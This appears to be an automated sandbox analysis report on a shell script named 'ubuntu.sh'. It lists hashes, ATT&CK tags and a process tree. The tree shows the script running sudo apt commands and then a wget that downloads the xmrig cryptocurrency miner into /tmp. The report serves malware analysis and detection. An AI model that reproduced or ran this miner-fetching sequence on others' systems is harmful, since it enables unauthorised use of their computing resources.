89679500c0767e7a2c56ac75e5e853e77807660e842f3aae7bc855c30c534aa5

Resubmissions

28/03/2025, 06:27

250328-g7715ssxfz 10

28/03/2025, 06:21

250328-g4j5xasxdx 10

Analysis

max time kernel
120s
max time network
122s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
28/03/2025, 06:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ubuntu.sh
Size

748B
MD5

229c643e9b0c79281884b70efba08109
SHA1

442e01e0af2650eb9419d443b19ab40779171d74
SHA256

89679500c0767e7a2c56ac75e5e853e77807660e842f3aae7bc855c30c534aa5
SHA512

88742f501ddb450ad04f09b3a16418d9fe9a541792c7bf68f0db63431e2e5d2c2132e45d60f807792625facad074feb351a015f98dc690833aff14eb2e993559

Score

6^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 2 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
719	sudo
986	sudo

Reads CPU attributes 1 TTPs 4 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/crypto/fips_enabled	gpgv
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/sys/crypto/fips_enabled	gpg-connect-agent
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/sys/crypto/fips_enabled	gpgconf
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/sys/crypto/fips_enabled	gpgv
File opened for reading	/proc/self/fd	gpgconf
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/crypto/fips_enabled	gpgconf
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/crypto/fips_enabled	gpg-connect-agent
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/kernel/ngroups_max	apt
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	gpgconf
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/crypto/fips_enabled	gpgv
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/self/fd	gpgv
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	gpgconf
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/fd	apt-config
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 31 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fileutl.message.nTYJ66	apt
File opened for modification	/tmp/apt-key-gpghome.6ClqwIk07t/pubring.orig.gpg	cp
File opened for modification	/tmp/apt.conf.RbE8tr	gpgv
File opened for modification	/tmp/apt-key-gpghome.rTJCKnO8Bo/gpg.1.sh	apt-key
File opened for modification	/tmp/xmrig-6.22.2-linux-static-x64.tar.gz	wget
File opened for modification	/tmp/apt.conf.zVTWY6	gpgv
File opened for modification	/tmp/fileutl.message.t7tmkK	apt
File opened for modification	/tmp/apt-key-gpghome.6ClqwIk07t/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.6ClqwIk07t/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.q1mj8z	apt
File opened for modification	/tmp/fileutl.message.1Y9URy	apt
File opened for modification	/tmp/fileutl.message.yREhc2	apt
File opened for modification	/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.orig.gpg	cp
File opened for modification	/tmp/apt.conf.xPJvbQ	gpgv
File opened for modification	/tmp/fileutl.message.547tPV	apt
File opened for modification	/tmp/fileutl.message.la68M4	apt
File opened for modification	/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.pUT5WGxhJh/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.sig.A8ErnI	gpgv
File opened for modification	/tmp/fileutl.message.qd8V9f	apt
File opened for modification	/tmp/fileutl.message.JBV9ph	apt
File opened for modification	/tmp/apt.sig.mpwt76	gpgv
File opened for modification	/tmp/apt.data.z66wt7	gpgv
File opened for modification	/tmp/fileutl.message.K0BUnd	apt
File opened for modification	/tmp/apt-key-gpghome.6ClqwIk07t/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.8S4HKB	apt
File opened for modification	/tmp/fileutl.message.vmmBos	apt
File opened for modification	/tmp/apt.data.fHGgeZ	gpgv
File opened for modification	/tmp/fileutl.message.uEDuZD	apt
File opened for modification	/tmp/fileutl.message.DZiimM	apt

/tmp/ubuntu.sh
/tmp/ubuntu.sh bcdedit /c set shutdown /r readonly /f force /t 2
1⤵
PID:715
- /usr/bin/sudo
  sudo apt update
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:719
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:733
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1ty2GQ-0000Bp-9a
      4⤵
      Reads CPU attributes
      PID:746
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:736
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1ty2GQ-0000Bs-9c
      4⤵
      Reads CPU attributes
      PID:745
- - /usr/bin/apt
    apt update
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:739
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:743
  - - /usr/lib/apt/methods/http
      /usr/lib/apt/methods/http
      4⤵
      PID:749
  - - /usr/lib/apt/methods/https
      /usr/lib/apt/methods/https
      4⤵
      PID:751
  - - /usr/lib/apt/methods/https
      /usr/lib/apt/methods/https
      4⤵
      PID:755
  - - /usr/lib/apt/methods/http
      /usr/lib/apt/methods/http
      4⤵
      PID:756
  - - /usr/lib/apt/methods/gpgv
      /usr/lib/apt/methods/gpgv
      4⤵
      PID:758
  - - /usr/lib/apt/methods/gpgv
      /usr/lib/apt/methods/gpgv
      4⤵
      Reads runtime system information
      Writes file to tmp directory
      PID:759
    - - /usr/bin/apt-key
        
        /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.mpwt76 /tmp/apt.data.z66wt7
        5⤵
        Writes file to tmp directory
        
        PID:761
      - /usr/bin/apt-config
        
        apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
        6⤵
        Reads runtime system information
        
        PID:763
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:764
      - /usr/bin/apt-config
        
        apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
        6⤵
        Reads runtime system information
        
        PID:765
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        
        PID:766
      - /usr/bin/apt-config
        
        apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
        6⤵
        
        PID:767
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        
        PID:768
      - /usr/bin/apt-config
        
        apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
        6⤵
        Reads runtime system information
        
        PID:769
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:770
      - /usr/bin/apt-config
        
        apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
        6⤵
        Reads runtime system information
        
        PID:771
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        
        PID:772
      - /usr/bin/apt-config
        
        apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
        6⤵
        Reads runtime system information
        
        PID:773
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:774
      - /usr/bin/apt-config
        
        apt-config shell GPGV Apt::Key::gpgvcommand
        6⤵
        Reads runtime system information
        
        PID:776
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        
        PID:777
      - /bin/mktemp
        
        mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
        6⤵
        
        PID:778
      - /bin/chmod
        
        chmod 700 /tmp/apt-key-gpghome.pUT5WGxhJh
        6⤵
        
        PID:779
      - /bin/readlink
        
        readlink -f /tmp/apt-key-gpghome.pUT5WGxhJh
        6⤵
        
        PID:780
      - /bin/rm
        
        rm -f /tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg
        6⤵
        
        PID:781
      - /usr/bin/touch
        
        touch /tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg
        6⤵
        Writes file to tmp directory
        
        PID:782
      - /usr/bin/apt-config
        
        apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
        6⤵
        
        PID:783
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:784
      - /bin/readlink
        
        readlink -f /etc/apt/trusted.gpg.d/
        6⤵
        
        PID:785
      - /usr/bin/find
        
        find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
        6⤵
        Reads runtime system information
        
        PID:786
      - /usr/bin/sort
        
        sort
        6⤵
        
        PID:789
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
        6⤵
        
        PID:791
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
        6⤵
        
        PID:793
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
        6⤵
        
        PID:795
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
        6⤵
        
        PID:797
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
        6⤵
        
        PID:799
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
        6⤵
        
        PID:802
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
        6⤵
        
        PID:805
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
        6⤵
        
        PID:807
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
        6⤵
        
        PID:809
      - /bin/cp
        
        cp -a /tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg /tmp/apt-key-gpghome.pUT5WGxhJh/pubring.orig.gpg
        6⤵
        Reads runtime system information
        Writes file to tmp directory
        
        PID:810
      - /bin/sed
        
        sed -e "s#'#'\"'\"'#g"
        6⤵
        Reads runtime system information
        
        PID:814
      - /bin/sed
        
        sed -e "s#'#'\"'\"'#g"
        6⤵
        Reads runtime system information
        
        PID:818
      - /usr/bin/gpgv
        
        gpgv --homedir /tmp/apt-key-gpghome.pUT5WGxhJh --keyring /tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.mpwt76 /tmp/apt.data.z66wt7
        6⤵
        Reads runtime system information
        
        PID:819
      - /usr/bin/gpgconf
        
        gpgconf --kill gpg-agent
        6⤵
        Reads runtime system information
        
        PID:822
        
        /usr/bin/gpg-connect-agent
        
        gpg-connect-agent --no-autostart KILLAGENT
        7⤵
        Reads runtime system information
        
        PID:823
      - /bin/rm
        
        rm -rf /tmp/apt-key-gpghome.pUT5WGxhJh
        6⤵
        
        PID:825
    - - /usr/bin/apt-key
        
        /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release.gpg /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release
        5⤵
        Writes file to tmp directory
        
        PID:828
      - /usr/bin/apt-config
        
        apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
        6⤵
        Reads runtime system information
        
        PID:831
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        
        PID:833
      - /usr/bin/apt-config
        
        apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
        6⤵
        Reads runtime system information
        
        PID:835
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:837
      - /usr/bin/apt-config
        
        apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
        6⤵
        
        PID:839
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:841
      - /usr/bin/apt-config
        
        apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
        6⤵
        Reads runtime system information
        
        PID:842
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:845
      - /usr/bin/apt-config
        
        apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
        6⤵
        Reads runtime system information
        
        PID:846
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:849
      - /usr/bin/apt-config
        
        apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
        6⤵
        Reads runtime system information
        
        PID:850
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        
        PID:853
      - /usr/bin/apt-config
        
        apt-config shell GPGV Apt::Key::gpgvcommand
        6⤵
        Reads runtime system information
        
        PID:856
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:858
      - /bin/mktemp
        
        mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
        6⤵
        
        PID:859
      - /bin/chmod
        
        chmod 700 /tmp/apt-key-gpghome.6ClqwIk07t
        6⤵
        
        PID:861
      - /bin/readlink
        
        readlink -f /tmp/apt-key-gpghome.6ClqwIk07t
        6⤵
        
        PID:862
      - /bin/rm
        
        rm -f /tmp/apt-key-gpghome.6ClqwIk07t/pubring.gpg
        6⤵
        
        PID:864
      - /usr/bin/touch
        
        touch /tmp/apt-key-gpghome.6ClqwIk07t/pubring.gpg
        6⤵
        Writes file to tmp directory
        
        PID:865
      - /usr/bin/apt-config
        
        apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
        6⤵
        Reads runtime system information
        
        PID:866
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:869
      - /bin/readlink
        
        readlink -f /etc/apt/trusted.gpg.d/
        6⤵
        
        PID:870
      - /usr/bin/find
        
        find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
        6⤵
        
        PID:871
      - /usr/bin/sort
        
        sort
        6⤵
        
        PID:875
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
        6⤵
        
        PID:878
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
        6⤵
        
        PID:880
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
        6⤵
        
        PID:883
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
        6⤵
        
        PID:885
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
        6⤵
        
        PID:888
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
        6⤵
        
        PID:890
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
        6⤵
        
        PID:892
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
        6⤵
        
        PID:895
      - /bin/cat
        
        cat /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
        6⤵
        
        PID:898
      - /bin/cp
        
        cp -a /tmp/apt-key-gpghome.6ClqwIk07t/pubring.gpg /tmp/apt-key-gpghome.6ClqwIk07t/pubring.orig.gpg
        6⤵
        Reads runtime system information
        Writes file to tmp directory
        
        PID:899
      - /bin/sed
        
        sed -e "s#'#'\"'\"'#g"
        6⤵
        Reads runtime system information
        
        PID:902
      - /bin/sed
        
        sed -e "s#'#'\"'\"'#g"
        6⤵
        Reads runtime system information
        
        PID:906
      - /usr/bin/gpgv
        
        gpgv --homedir /tmp/apt-key-gpghome.6ClqwIk07t --keyring /tmp/apt-key-gpghome.6ClqwIk07t/pubring.gpg --ignore-time-conflict --status-fd 3 /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release.gpg /var/lib/apt/lists/archive.debian.org_debian_dists_stretch_Release
        6⤵
        Reads runtime system information
        
        PID:908
      - /usr/bin/gpgconf
        
        gpgconf --kill gpg-agent
        6⤵
        Reads runtime system information
        
        PID:913
        
        /usr/bin/gpg-connect-agent
        
        gpg-connect-agent --no-autostart KILLAGENT
        7⤵
        Reads runtime system information
        
        PID:914
      - /bin/rm
        
        rm -rf /tmp/apt-key-gpghome.6ClqwIk07t
        6⤵
        
        PID:916
    - - /usr/bin/apt-key
        
        /usr/bin/apt-key --quiet --readonly --keyring /etc/apt/keyrings/nodesource.gpg verify --status-fd 3 /tmp/apt.sig.A8ErnI /tmp/apt.data.fHGgeZ
        5⤵
        Writes file to tmp directory
        
        PID:919
      - /usr/bin/apt-config
        
        apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
        6⤵
        Reads runtime system information
        
        PID:921
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:925
      - /usr/bin/apt-config
        
        apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
        6⤵
        
        PID:926
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:928
      - /usr/bin/apt-config
        
        apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
        6⤵
        Reads runtime system information
        
        PID:929
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:931
      - /usr/bin/apt-config
        
        apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
        6⤵
        Reads runtime system information
        
        PID:932
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:933
      - /usr/bin/apt-config
        
        apt-config shell GPGV Apt::Key::gpgvcommand
        6⤵
        
        PID:935
        
        /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        7⤵
        Reads runtime system information
        
        PID:936
      - /bin/mktemp
        
        mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
        6⤵
        
        PID:937
      - /bin/chmod
        
        chmod 700 /tmp/apt-key-gpghome.rTJCKnO8Bo
        6⤵
        
        PID:938
      - /bin/sed
        
        sed -e "s#'#'\"'\"'#g"
        6⤵
        Reads runtime system information
        
        PID:942
      - /bin/sed
        
        sed -e "s#'#'\"'\"'#g"
        6⤵
        
        PID:945
      - /usr/bin/gpgv
        
        gpgv --homedir /tmp/apt-key-gpghome.rTJCKnO8Bo --keyring /etc/apt/keyrings/nodesource.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.A8ErnI /tmp/apt.data.fHGgeZ
        6⤵
        Reads runtime system information
        
        PID:947
      - /usr/bin/gpgconf
        
        gpgconf --kill gpg-agent
        6⤵
        Reads runtime system information
        
        PID:948
        
        /usr/bin/gpg-connect-agent
        
        gpg-connect-agent --no-autostart KILLAGENT
        7⤵
        
        PID:949
      - /bin/rm
        
        rm -rf /tmp/apt-key-gpghome.rTJCKnO8Bo
        6⤵
        
        PID:950
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      PID:954
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      PID:985
- /usr/bin/sudo
  sudo apt install -y wget tar
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:986
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:989
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1ty2HW-0000Fx-CP
      4⤵
      Reads CPU attributes
      PID:995
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:992
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1ty2HW-0000G0-Cb
      4⤵
      Reads CPU attributes
      PID:996
- - /usr/bin/apt
    apt install -y wget tar
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:993
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:994
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:997
- /usr/bin/wget
  wget -O ./xmrig-6.22.2-linux-static-x64.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/apt-key-gpghome.6ClqwIk07t/gpg.1.sh

Filesize
82B

MD5
8e3ffa599efdeb0f686c1b03ad5f671e

SHA1
571d368b80c524b1eb9c035f54bcef3c1f625ff4

SHA256
620809b0eb81d9ae0694b22c3027941506313abe68cc2ed994d930d981b7a2bd

SHA512
96d3d400ff5b6b5752e0ef990689d2f0c0c4efbd49855c62e7cfb74d7f7abfaddf446167cc32f62d69334bf3012d34cce6a3ec4fa65d673857c03cf7058381b0

Download Submit
/tmp/apt-key-gpghome.pUT5WGxhJh/gpg.1.sh

Filesize
82B

MD5
897e884dcf7f6d434aa3c0d6ec548994

SHA1
0727aae6ffa5f1050edbd763c86ff7ffa6ff5dad

SHA256
58d8305ba4b212435a092d978e8c928bd991e2f4da51ab9270541e0eac0f3e7c

SHA512
4133da01c9a080003484ae439812508c57653b56399e73c530e4373bdead9123ee26b2faa04853e5f904bbebe54ba62d566ecbbb16aac7da02bee328984061da

Download Submit
/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg

Filesize
7KB

MD5
b53e6ca4ed295fc38621315853f623d0

SHA1
45a416f014809735ec88854a3540c8e9e89eb102

SHA256
6246307cc0130f6bd52510a477960f7c7be431b25979d7e20a88dc2fac58ac93

SHA512
30b5d2571840c2319a4af3907afda8ab00cf2879c83aaee1048ca972c0d3ddbf7995a167a31b19c45195b636ab46e73b0534459c6ee79c557fac8bfc01d857ac

Download Submit
/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg

Filesize
15KB

MD5
2713b38b3d7345961d8b80f4463483b8

SHA1
e6ec76aaebfea6a82f7984b57e07522a20365201

SHA256
389d00b5cbd2f69f32065448000a0607aec056e39af958f62e89c4c7e6228248

SHA512
ecee7b3045f49f7fa7443a8658602817bb2c8d2d07ae930536e3f2daaa5854903bf339af6c2fd4b02f8627f050ce360d2feddcf40569b58d304cfc459f418978

Download Submit
/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg

Filesize
18KB

MD5
760d3ab91f417958475b9a6342a5b92e

SHA1
137a06aea4b5c9e9ca11f0f5f1225da1c275c334

SHA256
42b348802c4290af6f9f30f984513f22fdd342ac3561ccb82957561a6b7c291f

SHA512
6cefcfae1c95c94b66b46d9242e62ddf7d7c65bd8d9bc9dc4e4c6230443ba33668ed160e1882f48a0b5daf59a46ccca09240ebe666017f059bd55e02fb1f2db6

Download Submit
/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg

Filesize
23KB

MD5
d63fbab9dfb826d53f7b3aaea45dbfb5

SHA1
59841d8e5423f788292af76d4350a948f4e25f53

SHA256
de329f1f48b751a7527f8ce3150452a4282ce69990e9318ab82d5b46b9f751ca

SHA512
20118f98c87eb60f0abafd5b4c2ffb4b1faf92777ee7402b98c0f5dc42d492c83f94d6903bdeee006187ac344a57afeaa84b54a973b483ff13e49773071d8198

Download Submit
/tmp/apt-key-gpghome.pUT5WGxhJh/pubring.gpg

Filesize
47KB

MD5
a4dc094481f22304cab5550218e6e4de

SHA1
f5886a324c0c026d0168656f23d1d898a0e43bd6

SHA256
eef8c4d7d518a986e4f1cfeec729b55369b863ed6b62a23cbe9d88aa56de5391

SHA512
0f040c957db3d500ba18315db33cca6eb18f9c80d952710f839833a73dd89b72e2e01178084c17348e312a427a6b9150937199b4912e71dfd1a7e2dd43723f68

Download Submit
/tmp/apt-key-gpghome.rTJCKnO8Bo/gpg.1.sh

Filesize
71B

MD5
4a502d34c9274bf20ac5781ec24f97d5

SHA1
524c16347caa1e4e4c89fe3a397248a4059be41c

SHA256
11f70f1f445376846199cd886a909f58a5eca110d2539720b1b938410836514d

SHA512
93ef1e10a3d08717b72b129dced28bd24adf1f94b86631b53ab15b5156b0c1b692962ce29c53f3ce9ef08b42a12db213927f1b1bca4a3f534de8f3ea7441a1bf

Download Submit
/tmp/apt.conf.zVTWY6

Filesize
7KB

MD5
3208d06221fa539c66ee1c7eab9ffe5d

SHA1
4dd2c78f109dbcf1ef9520ccaa64ac36dc6e9976

SHA256
50c4b994b3277bcefe6f4a83c785b6c33c48d402557da0321614b9d858c5837c

SHA512
d1e239fa6266928a0c0728a2632f7fa4a490740c2839f9aeafc23c5b742a02237197c98fab21d53f161d35027fb5c9fcc3b02ead6d1578d6df15352321cd40ce

Download Submit
/tmp/apt.data.z66wt7

Filesize
56KB

MD5
fd96c8ce5d0ef18d63bbe9ae17bb2659

SHA1
76b284743d95d3546df9d85c09712c830a30f614

SHA256
ffc8a7a283b61633aac383ddf8f863df3f39ef241a07a4127f51a2495ef674b3

SHA512
2486acdfc102f8f8498d8db2f205915115444dd118507369044202dc9a97109b4c738a2faf16c1f5ce5e4452ae0af17ae4691ac3bf5e7c5e2db271c0f40a4cb2

Download Submit
/tmp/apt.sig.mpwt76

Filesize
1KB

MD5
70274ce622b0cc437ef7f0caddc9d232

SHA1
124513a3ad2eb5aafa9be0920681e3bb8625979b

SHA256
4055d2ccc7c4be062ed390944548206ece5ed7613eae114b9e53ef15f3905230

SHA512
fed0054da258bb4a99e8adac359322d9ecc67caeee872309ea7d9863db6a1ec2a55497100e31538f42b43b9efc997e779e3774c8a0c6b0206254d7252d8699c8

Download Submit
/tmp/xmrig-6.22.2-linux-static-x64.tar.gz

Filesize
2.4MB

MD5
834876d3d106ae1f9bf9423f3b4f3fb9

SHA1
e7d77252fadbd7b70eca50a99acfd77cbfb9915f

SHA256
465264c8a65db5550ac7d1c2e3b9f9add8667ba3544eb676ebe7860607e2c49a

SHA512
43dd342c577c9e857998b3c039bb7f3e4b560bd5cdefd309a29307e1dfc04c54fee45951c0c06d21c77691c8857117e319f46c187483bd737b7e4f3f869d3d73

Download Submit
